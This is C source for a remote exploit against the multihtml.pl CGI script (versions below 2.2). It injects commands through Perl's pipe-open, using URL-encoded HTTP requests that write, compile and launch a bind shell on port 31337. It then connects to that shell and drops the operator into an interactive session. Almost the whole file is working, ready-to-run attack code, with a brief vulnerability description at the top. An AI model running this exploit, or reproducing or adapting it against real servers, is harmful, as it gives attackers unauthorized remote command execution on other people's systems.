/* 
 * exploit for /cgi-bin/multihtml.pl, versions < 2.2
 * vulnerability discovered by zillion
 * 
 * exploit written by bansh33 [rishi@siegesoft.com]
 *
 * [www.r00tabega.org - r00tabega security labs]
 * 
 * basically, the problem lies in the open(FILE, "$multi");
 * line of the program.  while zillion addressed the fact, that 
 * this allowed remote file viewing, he failed to mention that the perl
 * function open also allows the execution of commands if a pipe is passed to it.
 * the following exploit will spawn a remote shell on port 31337 on a target box.
 * 
 * vendor status: fixed in version 2.2
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <time.h>
#include <sys/time.h>
#include <unistd.h>

#define TRUE  0x00000001
#define FALSE 0x00000000
#define ERR   0xffffffff

typedef long sock_t;
typedef u_long ip_t;
typedef u_short port_t;

#define H1 "GET /cgi-bin/multihtml.pl?multi=%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%73%79%73%2f%73%6f%63%6b%65%74%2e%68%22%27%20%3E%20hi.c%7C"
#define H2 "GET /cgi-bin/multihtml.pl?multi=%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%6e%65%74%69%6e%65%74%2f%69%6e%2e%68%22%27%3E%3E%20hi.c"
#define CODE "GET /cgi-bin/multihtml.pl?multi=%0aecho%20%27%69%6e%74%20%6d%61%69%6e%28%29%7b%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%5f%69%6e%20%73%61%3b%69%6e%74%20%73%3d%73%6f%63%6b%65%74%28%32%2c%31%2c%30%29%3b%73%61%2e%73%69%6e%5f%61%64%64%72%2e%73%5f%61%64%64%72%3d%30%3b%73%61%2e%73%69%6e%5f%66%61%6d%69%6c%79%3d%32%3b%73%61%2e%73%69%6e%5f%70%6f%72%74%3d%32%37%30%30%32%3b%62%69%6e%64%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%6c%69%73%74%65%6e%28%73%2c%33%29%3b%77%68%69%6c%65%28%31%29%7b%69%6e%74%20%66%64%3d%61%63%63%65%70%74%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%64%75%70%32%28%66%64%2c%30%29%3b%64%75%70%32%28%66%64%2c%31%29%3b%64%75%70%32%28%66%64%2c%32%29%3b%73%79%73%74%65%6d%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%3b%7d%7d%27%20%3E%3Ehi.c%7C"
#define COMPILE "GET /cgi-bin/multihtml.pl?multi=%0agcc%20-o%20hi%20hi.c%7C"
#define THEHACK "GET /cgi-bin/multihtml.pl?multi=%0a%2e%2f%68%69%20%7C"
#define WHOAMI "uname -a; id;\n"

int    main          (int, char * *);
void   simshell      (int);
void   send_tcp_conn (char *, ip_t, port_t, int);
sock_t tcp_conn      (ip_t, port_t);
ip_t   resolve       (u_char *);

int main (int argc, char * * argv)
{
  sock_t fd;
  ip_t ipaddr;

  if (argc < 2)
  {
    fprintf(stderr, "MultiHTML exploit by bansh33\nUsage: %s <remote host>\n", *argv);
    exit(EXIT_SUCCESS);
  }  
  else if ((ipaddr = resolve(argv[1])) == ERR)
  {
    fprintf(stderr, "Couldn't resolve host.\n");
    exit(EXIT_SUCCESS);
  }


  fprintf(stderr, "MultiHTML exploit by bansh33\n");
  fprintf(stderr, "www.r00tabega.org\n\n");
  fprintf(stderr, "Owning %s: ", argv[1]);

  send_tcp_conn(H1, ipaddr, 80, 0);
  fprintf(stderr, ".");
  send_tcp_conn(H2, ipaddr, 80, 0);
  fprintf(stderr, ".");
  send_tcp_conn(CODE, ipaddr, 80, 0);
  fprintf(stderr, ".");
  send_tcp_conn(COMPILE, ipaddr, 80, 0);
  fprintf(stderr, ".");
  send_tcp_conn(THEHACK, ipaddr, 80, 1);
  fprintf(stderr, ".");

  fprintf(stderr, "\nDropping you to a shell...\n");

  fd = tcp_conn(ipaddr, 31337);
  send(fd, WHOAMI, strlen(WHOAMI), 0);
  simshell(fd);
}

void simshell (int fd)
{
  char buf[255];
  fd_set in_set;

  while (1)
  {
    FD_ZERO(&in_set);
    FD_SET(0, &in_set);
    FD_SET(fd, &in_set);

    if ((select(fd + 1, &in_set, 0, 0, NULL)))
    {
      if (FD_ISSET(fd, &in_set))
      {
        memset(buf, 0, 255);
        recv(fd, buf, 255, 0);
        if (!*buf) exit(EXIT_SUCCESS);
        fprintf(stderr, buf); 
      }
      else if (FD_ISSET(0, &in_set))
      {
        memset(buf, 0, 255);
        read(0, buf, 255);
        send(fd, buf, strlen(buf), 0);   
      }
    }
  }
}

void send_tcp_conn (char * buf, ip_t ipaddr, port_t port, int dis)
{
  sock_t fd;

  if ((fd = tcp_conn(ipaddr, port)) > 0)
    send(fd, buf, strlen(buf), 0); 
  if (!dis) close(fd);
}

sock_t tcp_conn (ip_t addr, port_t port)
{
  sock_t ret;
  struct sockaddr_in sa;

  sa.sin_addr.s_addr = addr;
  sa.sin_port = htons(port);
  sa.sin_family = AF_INET;

  if ((ret = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERR)
    return (ERR);

  else if ((connect(ret, (struct sockaddr *)&sa, sizeof(struct
sockaddr_in))) == ERR) return (ERR);

  return (ret);
}

ip_t resolve (u_char * host)
{
  struct in_addr addr;
  struct hostent * hp;

  if ((addr.s_addr = inet_addr(host)) == ERR)
  {
    if (!(hp = gethostbyname(host))) return (ERR);
    memcpy(&addr.s_addr, hp->h_addr, hp->h_length);
  }
  return (addr.s_addr);
}

/* EOF */